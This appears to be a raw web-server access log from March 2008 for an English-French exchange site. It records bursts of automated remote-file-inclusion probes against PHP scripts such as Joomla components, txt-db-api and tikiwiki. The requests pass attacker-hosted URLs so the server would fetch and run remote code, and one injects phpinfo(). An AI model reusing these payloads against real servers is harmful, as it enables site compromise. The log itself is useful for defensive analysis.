221.143.48.95 - - [30/Mar/2008:19:51:13 -0700] "GET /logs/index.php?page=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
220.135.204.131 - - [30/Mar/2008:19:52:08 -0700] "GET /logs/access_080225.log//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
220.135.204.131 - - [30/Mar/2008:19:52:10 -0700] "GET //saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
220.135.204.131 - - [30/Mar/2008:19:52:13 -0700] "GET /logs//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
140.113.4.81 - - [30/Mar/2008:19:53:02 -0700] "GET /logs/access_080225.log//admin/business_inc/saveserver.php?thisdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
66.6.223.240 - - [30/Mar/2008:19:53:19 -0700] "GET /logs//txt-db-api/txt-db-api.php?API_HOME_DIR=http://cct.vg/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.toulouseangloexchange.com"
66.6.223.240 - - [30/Mar/2008:19:53:20 -0700] "GET //txt-db-api/txt-db-api.php?API_HOME_DIR=http://cct.vg/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.toulouseangloexchange.com"
220.135.204.131 - - [30/Mar/2008:19:54:02 -0700] "GET /logs/access.log//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
89.149.195.135 - - [30/Mar/2008:19:55:00 -0700] "GET //txt-db-api/txt-db-api.php?API_HOME_DIR=http://cct.vg/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.toulouseangloexchange.com"
89.149.195.135 - - [30/Mar/2008:19:55:01 -0700] "GET /logs//txt-db-api/txt-db-api.php?API_HOME_DIR=http://cct.vg/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.toulouseangloexchange.com"
216.184.96.158 - - [30/Mar/2008:19:55:31 -0700] "GET //txt-db-api/txt-db-api.php?API_HOME_DIR=http://cct.vg/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.toulouseangloexchange.com"
216.184.96.158 - - [30/Mar/2008:19:55:31 -0700] "GET /logs//txt-db-api/txt-db-api.php?API_HOME_DIR=http://cct.vg/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.toulouseangloexchange.com"
87.118.102.153 - - [30/Mar/2008:19:55:48 -0700] "GET /logs/index.php?option=com_simpleboard&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.toulouseangloexchange.com"
87.118.102.153 - - [30/Mar/2008:19:55:48 -0700] "GET /index.php?option=com_simpleboard&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.toulouseangloexchange.com"
189.19.255.240 - - [30/Mar/2008:19:55:56 -0700] "GET /logs/access.log/manager/admin/p_ins.php?MGR=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
220.135.204.131 - - [30/Mar/2008:19:55:56 -0700] "GET /logs/access.log//saveserver.php?thisdir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
189.19.255.240 - - [30/Mar/2008:19:56:00 -0700] "GET /manager/admin/p_ins.php?MGR=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
189.19.255.240 - - [30/Mar/2008:19:56:01 -0700] "GET /logs/manager/admin/p_ins.php?MGR=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.16.236.69 - - [30/Mar/2008:19:56:43 -0700] "GET /logs/access_071231.log/send_reminders.php?includedir=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.16.236.69 - - [30/Mar/2008:19:56:43 -0700] "GET /send_reminders.php?includedir=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
208.16.236.69 - - [30/Mar/2008:19:56:44 -0700] "GET /logs/send_reminders.php?includedir=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
221.143.48.95 - - [30/Mar/2008:19:57:42 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
221.143.48.95 - - [30/Mar/2008:19:57:42 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:19:58:34 -0700] "GET /logs/access_071210.log//oneadmin/photogallery/include.php?path[docroot]=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:19:58:34 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:19:58:34 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:19:58:35 -0700] "GET /logs/access_071210.log//oneadmin/photogallery/include.php?path[docroot]=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:19:58:35 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:19:58:35 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
189.19.255.240 - - [30/Mar/2008:19:59:11 -0700] "GET /logs/access_080224.log/manager/admin/p_ins.php?MGR=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:00:16 -0700] "GET /logs/access_080114.log//oneadmin/photogallery/include.php?path[docroot]=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
195.56.111.194 - - [30/Mar/2008:20:00:19 -0700] "GET /logs/access_080211.log//component/option,com_remository/Itemid/func,select/admin.remository.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
195.56.111.194 - - [30/Mar/2008:20:00:20 -0700] "GET //component/option,com_remository/Itemid/func,select/admin.remository.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
195.56.111.194 - - [30/Mar/2008:20:00:20 -0700] "GET /logs//component/option,com_remository/Itemid/func,select/admin.remository.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:00:28 -0700] "GET /logs/access_080114.log//oneadmin/photogallery/include.php?path[docroot]=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
69.72.215.178 - - [30/Mar/2008:20:01:02 -0700] "GET /logs/access_080211.log//component/option,com_remository/Itemid/func,select/admin.remository.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.72.215.178 - - [30/Mar/2008:20:01:07 -0700] "GET //component/option,com_remository/Itemid/func,select/admin.remository.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.72.215.178 - - [30/Mar/2008:20:01:12 -0700] "GET /logs//component/option,com_remository/Itemid/func,select/admin.remository.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
88.151.103.27 - - [30/Mar/2008:20:01:13 -0700] "GET /logs/access_071231.log/send_reminders.php?includedir=ftp://84.32.137.157/incoming/upload/trec/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
88.151.103.27 - - [30/Mar/2008:20:01:14 -0700] "GET /send_reminders.php?includedir=ftp://84.32.137.157/incoming/upload/trec/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
88.151.103.27 - - [30/Mar/2008:20:01:14 -0700] "GET /logs/send_reminders.php?includedir=ftp://84.32.137.157/incoming/upload/trec/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
208.16.236.69 - - [30/Mar/2008:20:02:35 -0700] "GET /logs/access_080107.log/send_reminders.php?includedir=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
195.56.111.194 - - [30/Mar/2008:20:03:00 -0700] "GET /logs/access_080303.log//component/option,com_remository/Itemid/func,select/admin.remository.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
69.72.215.178 - - [30/Mar/2008:20:04:24 -0700] "GET /logs/access_080303.log//component/option,com_remository/Itemid/func,select/admin.remository.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.29.75.39 - - [30/Mar/2008:20:05:01 -0700] "GET /send_reminders.php?includedir=ftp://84.32.137.157/incoming/upload/trec/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:05:15 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:05:15 -0700] "GET //ashnews.php?pathtoashnews=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:05:15 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:05:16 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:05:16 -0700] "GET //ashnews.php?pathtoashnews=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:05:17 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
88.151.103.27 - - [30/Mar/2008:20:06:46 -0700] "GET /logs/access_080107.log/send_reminders.php?includedir=ftp://84.32.137.157/incoming/upload/trec/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
72.29.64.142 - - [30/Mar/2008:20:07:38 -0700] "GET /send_reminders.php?includedir=ftp://84.32.137.157/incoming/upload/trec/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.29.64.142 - - [30/Mar/2008:20:07:38 -0700] "GET /send_reminders.php?includedir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
59.106.75.43 - - [30/Mar/2008:20:07:41 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
59.106.75.43 - - [30/Mar/2008:20:07:42 -0700] "GET //ashnews.php?pathtoashnews=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
59.106.75.43 - - [30/Mar/2008:20:07:42 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
140.113.4.81 - - [30/Mar/2008:20:07:59 -0700] "GET /logs/access_080211.log//component/option,com_remository/Itemid/func,select/admin.remository.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
140.113.4.81 - - [30/Mar/2008:20:08:00 -0700] "GET //component/option,com_remository/Itemid/func,select/admin.remository.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
140.113.4.81 - - [30/Mar/2008:20:08:00 -0700] "GET /logs//component/option,com_remository/Itemid/func,select/admin.remository.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
89.149.195.135 - - [30/Mar/2008:20:10:14 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://cct.vg/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.toulouseangloexchange.com"
89.149.195.135 - - [30/Mar/2008:20:10:25 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://cct.vg/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:11:03 -0700] "GET /logs/access_080211.log/index.php?page=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:11:03 -0700] "GET /index.php?page=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:11:03 -0700] "GET /logs/index.php?page=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
58.68.45.40 - - [30/Mar/2008:20:11:11 -0700] "GET /logs/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.toulouseangloexchange.com"
58.68.45.40 - - [30/Mar/2008:20:11:18 -0700] "GET /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.toulouseangloexchange.com"
62.193.226.196 - - [30/Mar/2008:20:11:18 -0700] "GET /logs/access_080303.log//component/option,com_remository/Itemid/func,select/admin.remository.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.193.226.196 - - [30/Mar/2008:20:11:19 -0700] "GET //component/option,com_remository/Itemid/func,select/admin.remository.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.193.226.196 - - [30/Mar/2008:20:11:19 -0700] "GET /logs//component/option,com_remository/Itemid/func,select/admin.remository.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:11:25 -0700] "GET /logs/access_080114.log//components/com_simpleboard/image_upload.php?sbp=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:11:25 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:11:25 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:11:25 -0700] "GET /logs/access_080114.log//components/com_simpleboard/image_upload.php?sbp=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:11:25 -0700] "GET /logs/access_080127.log//components/com_simpleboard/image_upload.php?sbp=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:11:25 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:11:25 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:11:25 -0700] "GET /logs/access_080127.log//components/com_simpleboard/image_upload.php?sbp=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:11:28 -0700] "GET /logs/access_080211.log/index.php?page=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.29.75.39 - - [30/Mar/2008:20:11:29 -0700] "GET /index.php?visualizar=ftp://84.32.137.157/incoming/upload/trec/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:11:31 -0700] "GET /index.php?page=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:11:31 -0700] "GET /logs/index.php?page=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
62.193.226.196 - - [30/Mar/2008:20:11:33 -0700] "GET /logs/access_080211.log//component/option,com_remository/Itemid/func,select/admin.remository.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
195.56.111.194 - - [30/Mar/2008:20:12:48 -0700] "GET /logs/access_071210.log//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
195.56.111.194 - - [30/Mar/2008:20:12:49 -0700] "GET //txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
195.56.111.194 - - [30/Mar/2008:20:12:49 -0700] "GET /logs//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.29.75.39 - - [30/Mar/2008:20:12:59 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=ftp://84.32.137.157/incoming/upload/trec/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
189.19.255.240 - - [30/Mar/2008:20:13:05 -0700] "GET /logs/access_080204.log/[ScriptCMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
189.19.255.240 - - [30/Mar/2008:20:13:06 -0700] "GET /[ScriptCMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
189.19.255.240 - - [30/Mar/2008:20:13:09 -0700] "GET /logs/[ScriptCMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
221.143.48.95 - - [30/Mar/2008:20:13:41 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
221.143.48.95 - - [30/Mar/2008:20:13:41 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.sterus.net/zeroboard/data/languange/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.toulouseangloexchange.com"
195.56.111.194 - - [30/Mar/2008:20:14:03 -0700] "GET /logs/access_080128.log//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.30.216.101 - - [30/Mar/2008:20:14:18 -0700] "GET /logs/access_080303.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
72.29.75.39 - - [30/Mar/2008:20:14:54 -0700] "GET /logs/access_071231.log/send_reminders.php?includedir=ftp://84.32.137.157/incoming/upload/trec/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.29.75.39 - - [30/Mar/2008:20:14:54 -0700] "GET /logs/send_reminders.php?includedir=ftp://84.32.137.157/incoming/upload/trec/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.29.64.142 - - [30/Mar/2008:20:15:40 -0700] "GET /index.php?visualizar=ftp://84.32.137.157/incoming/upload/trec/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.29.64.142 - - [30/Mar/2008:20:15:40 -0700] "GET /index.php?visualizar=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:15:42 -0700] "GET /logs/access_080211.log/index.php?page=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:15:42 -0700] "GET /index.php?page=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.246.77.203 - - [30/Mar/2008:20:15:42 -0700] "GET /logs/index.php?page=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.29.64.142 - - [30/Mar/2008:20:18:03 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=ftp://84.32.137.157/incoming/upload/trec/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
